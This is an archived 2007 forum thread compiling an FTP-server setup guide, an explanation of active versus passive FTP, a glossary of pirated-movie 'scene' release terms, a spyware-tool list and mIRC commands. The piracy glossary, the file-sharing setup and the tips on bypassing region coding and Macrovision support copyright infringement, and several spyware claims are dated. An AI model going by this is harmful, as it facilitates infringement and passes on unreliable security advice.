Well, since many of us have always wondered this, here it is. Long and drawn out. Also, before attempting this, realize one thing; You will have to give up your time, effort, bandwidth, and security to have a quality ftp server.
That being said, here it goes. First of all, find out if your IP (Internet Protocol) is static (not changing) or dynamic (changes everytime you log on). To do this, first consider the fact if you have a dial up modem. If you do, chances are about 999 999 out of 1 000 000 that your IP is dynamic. To make it static, just go to a place like h*tp://Only the registered members can see the link to register for a static ip address.

You'll then need to get your IP. This can be done by doing this:
Going to Start -> Run -> winipcfg or Only the registered members can see the link and asking 'What is my IP?'

After doing so, you'll need to download an FTP server client. Personally, I'd recommend G6 FTP Server, Serv-U FTPor Bullitproof v2.15 all three of which are extremely reliable, and the norm of the ftp world.
You can download them on this site: h*tp://Only the registered members can see the link

First, you'll have to set up your ftp. For this guide, I will use step-by-step instructions for G6. First, you'll have to go into 'Setup -> General'. From here, type in your port # (default is 21). I recommend something unique, or something a bit larger (ex: 3069). If you want to, check the number of max users (this sets the amount of simultaneous maximum users on your server at once performing actions - The more on at once, the slower the connection and vice versa).

The below options are then chooseable:
-Launch with windows
-Activate FTP Server on Start-up
-Put into tray on startup
-Allow multiple instances
-Show "Loading..." status at startup
-Scan drive(s) at startup
-Confirm exit

You can do what you want with these, as they are pretty self explanatory. The scan drive feature is nice, as is the 2nd and the last option. From here, click the 'options' text on the left column.

To protect your server, you should check 'login check' and 'password check', 'Show relative path (a must!)', and any other options you feel you'll need. After doing so, click the 'advanced' text in the left column. You should then leave the buffer size on the default (unless of course you know what you're doing ), and then allow the type of ftp you want.

Uploading and downloading is usually good, but it's up to you if you want to allow uploads and/or downloads. For the server priority, that will determine how much conventional memory will be used and how much 'effort' will go into making your server run smoothly.

Anti-hammering is also good, as it prevents people from slowing down your speed. From here, click 'Log Options' from the left column. If you would like to see and record every single command and clutter up your screen, leave the defaults.

But, if you would like to see what is going on with the lowest possible space taken, click 'Screen' in the top column. You should then check off 'Log successful logins', and all of the options in the client directry, except 'Log directory changes'. After doing so, click 'Ok' in the bottom left corner.

You will then have to go into 'Setup -> User Accounts' (or ctrl & u). From here, you should click on the right most column, and right click. Choose 'Add', and choose the username(s) you would like people to have access to.

After giving a name (ex: themoonlanding), you will have to give them a set password in the bottom column (ex: wasfaked). For the 'Home IP' directory, (if you registered with a static server, check 'All IP Homes'. If your IP is static by default, choose your IP from the list. You will then have to right click in the very center column, and choose 'Add'.

From here, you will have to set the directory you want the people to have access to. After choosing the directory, I suggest you choose the options 'Read', 'List', and 'Subdirs', unless of course you know what you're doing . After doing so, make an 'upload' folder in the directory, and choose to 'add' this folder seperately to the center column. Choose 'write', 'append', 'make', 'list', and 'subdirs'. This will allow them to upload only to specific folders (your upload folder).

Now click on 'Miscellaneous' from the left column. Choose 'enable account', your time-out (how long it takes for people to remain idle before you automatically kick them off), the maximum number of users for this name, the maximum number of connections allowed simultaneously for one ip address, show relative path (a must!), and any other things at the bottom you'd like to have. Now click 'Ok'.
**Requested**


From this main menu, click the little boxing glove icon in the top corner, and right click and unchoose the hit-o-meter for both uploads and downloads (with this you can monitor IP activity). Now click the lightning bolt, and your server is now up and running.

Post your ftp info, like this:

213.10.93.141 (or something else, such as: 'f*p://example.getmyip.com')

User: *** (The username of the client)

Pass: *** (The password)

Port: *** (The port number you chose)

So make a FTP and join the FTP section


Listing The Contents Of A Ftp:

Listing the content of a FTP is very simple.
You will need FTP Content Maker, which can be downloaded from here:
ht*p://Only the registered members can see the link

1. Put in the IP of the server. Do not put "ftp://" or a "/" because it will not work if you do so.
2. Put in the port. If the port is the default number, 21, you do not have to enter it.
3. Put in the username and password in the appropriate fields. If the login is anonymous, you do not have to enter it.
4. If you want to list a specific directory of the FTP, place it in the directory field. Otherwise, do not enter anything in the directory field.
5. Click "Take the List!"
6. After the list has been taken, click the UBB output tab, and copy and paste to wherever you want it.


If FTP Content Maker is not working, it is probably because the server does not utilize Serv-U Software.

If you get this error message:
StatusCode = 550
LastResponse was : 'Unable to open local file test-ftp'
Error = 550 (Unable to open local file test-ftp)
Error = Unable to open local file test-ftp = 550
Close and restart FTP Content Maker, then try again.




error messages:

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.


Active FTP vs. Passive FTP, a Definitive Explanation

Introduction
One of the most commonly seen questions when dealing with firewalls and other Internet connectivity issues is the difference between active and passive FTP and how best to support either or both of them. Hopefully the following text will help to clear up some of the confusion over how to support FTP in a firewalled environment.

This may not be the definitive explanation, as the title claims, however, I've heard enough good feedback and seen this document linked in enough places to know that quite a few people have found it to be useful. I am always looking for ways to improve things though, and if you find something that is not quite clear or needs more explanation, please let me know! Recent additions to this document include the examples of both active and passive command line FTP sessions. These session examples should help make things a bit clearer. They also provide a nice picture into what goes on behind the scenes during an FTP session. Now, on to the information...



The Basics
FTP is a TCP based service exclusively. There is no UDP component to FTP. FTP is an unusual service in that it utilizes two ports, a 'data' port and a 'command' port (also known as the control port). Traditionally these are port 21 for the command port and port 20 for the data port. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.



Active FTP
In active mode FTP the client connects from a random unprivileged port (N > 1024) to the FTP server's command port, port 21. Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server. The server will then connect back to the client's specified data port from its local data port, which is port 20.

From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's port 20 to ports > 1024 (Server initiates data connection to client's data port)
FTP server's port 20 from ports > 1024 (Client sends ACKs to server's data port)


In step 1, the client's command port contacts the server's command port and sends the command PORT 1027. The server then sends an ACK back to the client's command port in step 2. In step 3 the server initiates a connection on its local data port to the data port the client specified earlier. Finally, the client sends an ACK back as shown in step 4.

The main problem with active mode FTP actually falls on the client side. The FTP client doesn't make the actual connection to the data port of the server--it simply tells the server what port it is listening on and the server connects back to the specified port on the client. From the client side firewall this appears to be an outside system initiating a connection to an internal client--something that is usually blocked.



Active FTP Example
Below is an actual example of an active FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

There are a few interesting things to consider about this dialog. Notice that when the PORT command is issued, it specifies a port on the client (192.168.150.80) system, rather than the server. We will see the opposite behavior when we use passive FTP. While we are on the subject, a quick note about the format of the PORT command. As you can see in the example below it is formatted as a series of six numbers separated by commas. The first four octets are the IP address while the second two octets comprise the port that will be used for the data connection. To find the actual port multiply the fifth octet by 256 and then add the sixth octet to the total. Thus in the example below the port number is ( (14*256) + 178), or 3762. A quick check with netstat should confirm this information.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PORT 192,168,150,80,14,178
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for file list.
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.


Passive FTP
In order to resolve the issue of the server initiating the connection to the client a different method for FTP connections was developed. This was known as passive mode, or PASV, after the command used by the client to tell the server it is in passive mode.

In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server. When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1024 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The result of this is that the server then opens a random unprivileged port (P > 1024) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data.

From the server-side firewall's standpoint, to support passive mode FTP the following communication channels need to be opened:

FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1024 (Server responds to client's control port)
FTP server's ports > 1024 from anywhere (Client initiates data connection to random port specified by server)
FTP server's ports > 1024 to remote ports > 1024 (Server sends ACKs (and data) to client's data port)



In step 1, the client contacts the server on the command port and issues the PASV command. The server then replies in step 2 with PORT 2024, telling the client which port it is listening to for the data connection. In step 3 the client then initiates the data connection from its data port to the specified server data port. Finally, the server sends back an ACK in step 4 to the client's data port.

While passive mode FTP solves many of the problems from the client side, it opens up a whole range of problems on the server side. The biggest issue is the need to allow any remote connection to high numbered ports on the server. Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. See Appendix 1 for more information.

The second issue involves supporting and troubleshooting clients which do (or do not) support passive mode. As an example, the command line FTP utility provided with Solaris does not support passive mode, necessitating a third-party FTP client, such as ncftp.

With the massive popularity of the World Wide Web, many people prefer to use their web browser as an FTP client. Most browsers only support passive mode when accessing ftp:// URLs. This can either be good or bad depending on what the servers and firewalls are configured to support.



Passive FTP Example
Below is an actual example of a passive FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (192.168.150.80), a linux box running the standard FTP command line client, to testbox2.slacksite.com (192.168.150.90), a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

Notice the difference in the PORT command in this example as opposed to the active FTP example. Here, we see a port being opened on the server (192.168.150.90) system, rather than the client. See the discussion about the format of the PORT command above, in the Active FTP Example section.

testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PASV
227 Entering Passive Mode (192,168,150,90,195,149).
---> LIST
150 Opening ASCII mode data connection for file list
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.


Summary
The following chart should help admins remember how each FTP mode works:

Active FTP :
command : client >1024 -> server 21
data : client >1024 <- server 20

Passive FTP :
command : client >1024 -> server 21
data : client >1024 -> server >1024

A quick summary of the pros and cons of active vs. passive FTP is also in order:

Active FTP is beneficial to the FTP server admin, but detrimental to the client side admin. The FTP server attempts to make connections to random high ports on the client, which would almost certainly be blocked by a firewall on the client side. Passive FTP is beneficial to the client, but detrimental to the FTP server admin. The client will make both connections to the server, but one of them will be to a random high port, which would almost certainly be blocked by a firewall on the server side.

Luckily, there is somewhat of a compromise. Since admins running FTP servers will need to make their servers accessible to the greatest number of clients, they will almost certainly need to support passive FTP. The exposure of high level ports on the server can be minimized by specifying a limited port range for the FTP server to use. Thus, everything except for this range of ports can be firewalled on the server side. While this doesn't eliminate all risk to the server, it decreases it tremendously.

Master
28-04-07, 23:52
Original Sources

CAM -
A cam is a theater rip usually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn't always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there's text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from the onboard microphone of the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes we're lucky, and the theater will be fairly empty and a fairly clear signal will be heard.



TELESYNC (TS) - A telesync is the same spec as a CAM except it uses an external audio source (most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release. A high percentage of Telesyncs are CAMs that have been mislabeled.



TELECINE (TC) -
A telecine machine copies the film digitally from the reels. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, although 4:3 telecines have existed. A great example is the JURASSIC PARK 3 TC done last year. TC should not be confused with TimeCode , which is a visible counter on screen throughout the film.



SCREENER (SCR) -
A pre VHS tape, sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a "ticker" (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied tape. Most screeners are transferred to VCD, but a few attempts at SVCD have occurred, some looking better than others.



DVD-SCREENER (DVDscr) -Same premise as a screener, but transferred off a DVD. Usually letterbox , but without the extras that a DVD retail would contain. The ticker is not usually in the black bars, and will disrupt the viewing. If the ripper has any skill, a DVDscr should be very good. Usually transferred to SVCD or DivX/XviD.



DVDRip - A copy of the final released DVD. If possible this is released PRE retail (for example, Star Wars episode 2) again, should be excellent quality. DVDrips are released in SVCD and DivX/XviD.



VHSRip -Transferred off a retail VHS, mainly skating/sports videos and XXX releases.



TVRip -TV episode that is either from Network (capped using digital cable/satellite boxes are preferable) or PRE-AIR from satellite feeds sending the program around to networks a few days earlier (do not contain "dogs" but sometimes have flickers etc) Some programs such as WWF Raw Is War contain extra parts, and the "dark matches" and camera/commentary tests are included on the rips. PDTV is capped from a digital TV PCI card, generally giving the best results, and groups tend to release in SVCD for these. VCD/SVCD/DivX/XviD rips are all supported by the TV scene.



WORKPRINT (WP) -A workprint is a copy of the film that has not been finished. It can be missing scenes, music, and quality can range from excellent to very poor. Some WPs are very different from the final print (Men In Black is missing all the aliens, and has actors in their places) and others can contain extra scenes (Jay and Silent Bob) . WPs can be nice additions to the collection once a good quality final has been obtained.



DivX Re-Enc -A DivX re-enc is a film that has been taken from its original VCD source, and re-encoded into a small DivX file. Most commonly found on file sharers, these are usually labeled something like Film.Name.Group(1of2) etc. Common groups are SMR and TND. These aren't really worth downloading, unless you're that unsure about a film u only want a 200mb copy of it. Generally avoid.



Watermarks -
A lot of films come from Asian Silvers/PDVD (see below) and these are tagged by the people responsible. Usually with a letter/initials or a little logo, generally in one of the corners. Most famous are the "Z" "A" and "Globe" watermarks.



Asian Silvers / PDVD -
These are films put out by eastern bootleggers, and these are usually bought by some groups to put out as their own. Silvers are very cheap and easily available in a lot of countries, and its easy to put out a release, which is why there are so many in the scene at the moment, mainly from smaller groups who don't last more than a few releases. PDVDs are the same thing pressed onto a DVD. They have removable subtitles, and the quality is usually better than the silvers. These are ripped like a normal DVD, but usually released as VCD.






Formats

VCD -
VCD is an mpeg1 based format, with a constant bitrate of 1150kbit at a resolution of 352x240 (NTCS). VCDs are generally used for lower quality transfers (CAM/TS/TC/Screener(VHS)/TVrip(analogue) in order to make smaller file sizes, and fit as much on a single disc as possible. Both VCDs and SVCDs are timed in minutes, rather than MB, so when looking at an mpeg, it may appear larger than the disc capacity, and in reality u can fit 74min on a CDR74.



SVCD -
SVCD is an mpeg2 based (same as DVD) which allows variable bit-rates of up to 2500kbits at a resolution of 480x480 (NTSC) which is then decompressed into a 4:3 aspect ratio when played back. Due to the variable bit-rate, the length you can fit on a single CDR is not fixed, but generally between 35-60 Mins are the most common. To get a better SVCD encode using variable bit-rates, it is important to use multiple "passes". this takes a lot longer, but the results are far clearer.



XVCD/XSVCD -
These are basically VCD/SVCD that don't obey the "rules". They are both capable of much higher resolutions and bit-rates, but it all depends on the player to whether the disc can be played. X(S)VCD are total non-standards, and are usually for home-ripping by people who don't intend to release them.



KVCD Thanks for lardo4life for the info
KVCD is a modification to the standard MPEG-1 and MPEG-2 GOP structure and Quantization Matrix. It enables you to create over 120 minutes of near DVD quality video, depending on your material, on a single 80 minute CD-R/CD-RW. We have published these specifications as KVCDx3, our official resolution, which produce 528x480 (NTSC) and 528x576 (PAL) MPEG-1 variable bit rate video, from 64Kbps to 3,000Kbps. Using a resolution of 352x240 (NTSC) or 352x288 (PAL), it's possible to encode video up to ~360 minutes of near VCD quality on a single 80 minute CD-R. The mpeg files created will play back in most modern standalone DVD players. You must burn the KVCD MPEG files as non-standard VCD or non-standard SVCD (depends on your player) with Nero or VCDEasy.



DivX / XviD -
DivX is a format designed for multimedia platforms. It uses two codecs, one low motion, one high motion. most older films were encoded in low motion only, and they have problems with high motion too. A method known as SBC (Smart Bit-rate Control) was developed which switches codecs at the encoding stage, making a much better print. The format is Ana orphic and the bit-rate/resolution are interchangeable. Due to the higher processing power required, and the different codecs for playback, its unlikely we'll see a DVD player capable of play DivX for quite a while, if at all. There have been players in development which are supposedly capable, but nothing has ever arisen. The majority of PROPER DivX rips (not Re-Encs) are taken from DVDs, and generally up to 2hours in good quality is possible per disc. Various codecs exist, most popular being the original Divx3.11a and the new XviD codecs.



CVD -
CVD is a combination of VCD and SVCD formats, and is generally supported by a majority of DVD players. It supports MPEG2 bit-rates of SVCD, but uses a resolution of 352x480(ntsc) as the horizontal resolution is generally less important. Currently no groups release in CVD.



DVD-R -
Is the recordable DVD solution that seems to be the most popular (out of DVD-RAM, DVD-R and DVD+R). it holds 4.7gb of data per side, and double sided discs are available, so discs can hold nearly 10gb in some circumstances. SVCD mpeg2 images must be converted before they can be burnt to DVD-R and played successfully. DVD>DVDR copies are possible, but sometimes extras/languages have to be removed to stick within the available 4.7gb.



MiniDVD -
MiniDVD/cDVD is the same format as DVD but on a standard CDR/CDRW. Because of the high resolution/bit-rates, its only possible to fit about 18-21 mins of footage per disc, and the format is only compatible with a few players.






Misc Info

Regional Coding -
This was designed to stop people buying American DVDs and watching them earlier in other countries, or for older films where world distribution is handled by different companies. A lot of players can either be hacked with a chip, or via a remote to disable this.



RCE -
RCE (Regional Coding Enhancement) was designed to overcome "Multiregion" players, but it had a lot of faults and was overcome. Very few titles are RCE encoded now, and it was very unpopular.



Macrovision -
Macrovision is the copy protection employed on most commercial DVDs. Its a system that will display lines and darken the images of copies that are made by sending the VHS signals it can't understand. Certain DVD players (for example the Dansai 852 from Tescos) have a secret menu where you can disable the macrovision, or a "video stabaliser" costs about 30UKP from Maplin (Only the registered members can see the link)



NTSC/PAL -
NTSC and PAL are the two main standards used across the world. NTSC has a higher frame rate than pal (29fps compared to 25fps) but PAL has an increased resolution, and gives off a generally sharper picture. Playing NTSC discs on PAL systems seems a lot easier than vice-versa, which is good news for the Brits An RGB enabled scart lead will play an NTSC picture in full colour on most modern tv sets, but to record this to a VHS tape, you will need to convert it to PAL50 (not PAL60 as the majority of DVD players do.) This is either achieved by an expensive converter box (in the regions of £200+) an onboard converter (such as the Dansai 852 / certain Daewoos / Samsung 709 ) or using a World Standards VCR which can record in any format.



News Sites -
There are generally 2 news sites for film release for p2p and they are:

nforce - VCD Help
Code:
Only the registered members can see the link

Code:
Only the registered members can see the link




About Release Files

RARset -
The movies are all supplied in RAR form, whether its v2 (rar>.rxx) or v3 (part01.rar > partxx.rar) form.



BIN/CUE -
VCD and SVCD films will extract to give a BIN/CUE. Load the .CUE into notepad and make sure the first line contains only a filename, and no path information. Then load the cue into Nero/CDRWin etc and this will burn the VCD/SVCD correctly. TV rips are released as MPEG. DivX files are just the plain DivX - .AVI



NFO -
An NFO file is supplied with each movie to promote the group, and give general iNFOrmation about the release, such as format, source, size, and any notes that may be of use. They are also used to recruit members and acquire hardware for the group.

SFV -
Also supplied for each disc is an SFV file. These are mainly used on site level to check each file has been uploaded correctly, but are also handy for people downloading to check they have all the files, and the CRC is correct. A program such as pdSFV or hkSFV is required to use these files.






Usenet Information

Access -
To get onto newsgroups, you will need a news server. Most ISPs supply one, but this is usually of poor retention (the amount of time the files are on server for) and poor completition (the amount of files that make it there). For the best service, a premium news server should be paid for, and these will often have bandwidth restrictions in place.



Software -
You will need a newsreader to access the files in the binary newsgroups. There are many different readers, and its usually down to personal opinion which is best. Xnews / Forte Agent / BNR 1 / BNR 2 are amongst the popular choices. Outlook has the ability to read newsgroups, but its recommended to not use that.



Format -
Usenet posts are often the same as those listed on VCDQUALiTY (i.e., untouched group releases) but you have to check the filenames and the description to make sure you get what you think you are getting. Generally releases should come down in .RAR sets. Posts will usually take more than one day to be uploaded, and can be spread out as far as a week.



PAR files -
As well as the .rxx files, you will also see files listed as .pxx/.par . These are PARITY files. Parity files are common in usenet posts, as a lot of times, there will be at least one or two damaged files on some servers. A parity file can be used to replace ANY ONE file that is missing from the rar set. The more PAR files you have, the more files you can replace. You will need a program called SMARTPAR for this.






Scene Tags

PROPER -
Due to scene rules, whoever releases the first Telesync has won that race (for example). But if the quality of that release is fairly poor, if another group has another telesync (or the same source in higher quality) then the tag PROPER is added to the folder to avoid being duped. PROPER is the most subjective tag in the scene, and a lot of people will generally argue whether the PROPER is better than the original release. A lot of groups release PROPERS just out of desperation due to losing the race. A reason for the PROPER should always be included in the NFO.



SUBBED -
In the case of a VCD, if a release is subbed, it usually means it has hard encoded subtitles burnt throughout the movie. These are generally in malaysian/chinese/thai etc, and sometimes there are two different languages, which can take up quite a large amount of the screen. SVCD supports switch able subtitles, so some DVDRips are released with switch able subs. This will be mentioned in the NFO file if included.



UNSUBBED -
When a film has had a subbed release in the past, an Unsubbed release may be released

LIMITED -
A limited movie means it has had a limited theater run, generally opening in less than 250 theaters, generally smaller films (such as art house films) are released as limited.



INTERNAL -
An internal release is done for several reasons. Classic DVD groups do a lot of .INTERNAL. releases, as they wont be dupe'd on it. Also lower quality theater rips are done INTERNAL so not to lower the reputation of the group, or due to the amount of rips done already. An INTERNAL release is available as normal on the groups affiliate sites, but they can't be traded to other sites without request from the site ops. Some INTERNAL releases still trickle down to IRC/Newsgroups, it usually depends on the title and the popularity. Earlier in the year people referred to Centropy going "internal". This meant the group were only releasing the movies to their members and site ops. This is in a different context to the usual definition.



STV -
Straight To Video. Was never released in theaters, and therefore a lot of sites do not allow these.



OTHER TAGS -

*WS* for widescreen (letterbox)
*FS* for Fullscreen.



RECODE -
A recode is a previously released version, usually filtered through TMPGenc to remove subtitles, fix color etc. Whilst they can look better, its not looked upon highly as groups are expected to obtain their own sources.



REPACK -
If a group releases a bad rip, they will release a Repack which will fix the problems.



NUKED -
A film can be nuked for various reasons. Individual sites will nuke for breaking their rules (such as "No Telesyncs") but if the film has something extremely wrong with it (no soundtrack for 20mins, CD2 is incorrect film/game etc) then a global nuke will occur, and people trading it across sites will lose their credits. Nuked films can still reach other sources such as p2p/usenet, but its a good idea to check why it was nuked first in case. If a group realise there is something wrong, they can request a nuke.

NUKE REASONS :: this is a list of common reasons a film can be nuked for (generally DVDRip)

** BAD A/R ** :: bad aspect ratio, ie people appear too fat/thin
** BAD IVTC ** :: bad inverse telecine. process of converting framerates was incorrect.
** INTERLACED ** :: black lines on movement as the field order is incorrect.



DUPE -
Dupe is quite simply, if something exists already, then theres no reason for it to exist again without proper reason.

Master
28-04-07, 23:54
There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: Only the registered members can see the link

If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (Only the registered members can see the link) This program is Free
Try: AdMuncher (Only the registered members can see the link) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (Only the registered members can see the link) This program is Free
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (Only the registered members can see the link) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (Only the registered members can see the link) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (Only the registered members can see the link) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (Only the registered members can see the link) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.


If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (Only the registered members can see the link) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (Only the registered members can see the link) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (Only the registered members can see the link) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Try: SpySites (Only the registered members can see the link) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (Only the registered members can see the link) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended

Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
Only the registered members can see the link - 15k


Finding . is a Click Away at 2020Search.com
Having trouble finding what you re looking for on: .? 2020Search will instantly provide you with the result you re looking for by drawing on some of the best search engines the Internet has to offer. Your result is a click away!
Only the registered members can see the link - 43k


Download the BrowserVillage Toolbar.
Customize your Browser! Eliminate Pop-up ads before they start, Quick and easy access to the Web, and much more. Click Here to Install Now!
Only the registered members can see the link - 36k

Master
28-04-07, 23:55
All mIRC Commands

/ Recalls the previous command entered in the current window.
/! Recalls the last command typed in any window.
/action {action text} Sends the specifed action to the active channel or query window.
/add [-apuce] {filename.ini} Loads aliases, popups, users, commands, and events.
/ame {action text} Sends the specifed action to all channels which you are currently on.
/amsg {text} Sends the specifed message to all channels which you are currently on.
/auser {level} {nick|address} Adds a user with the specified access level to the remote users
list.
/auto [on|off|nickname|address] Toggles auto-opping of a nick or address or sets it on or off
totally.
/away {away message} Sets you away leave a message explaining that you are not currently paying
attention to IRC.
/away Sets you being back.
/ban [#channel] {nickname} [type] Bans the specified nick from the curent or given channel.
/beep {number} {delay} Locally beeps 'number' times with 'delay' in between the beeps. /channel
Pops up the channel central window (only works in a channel).
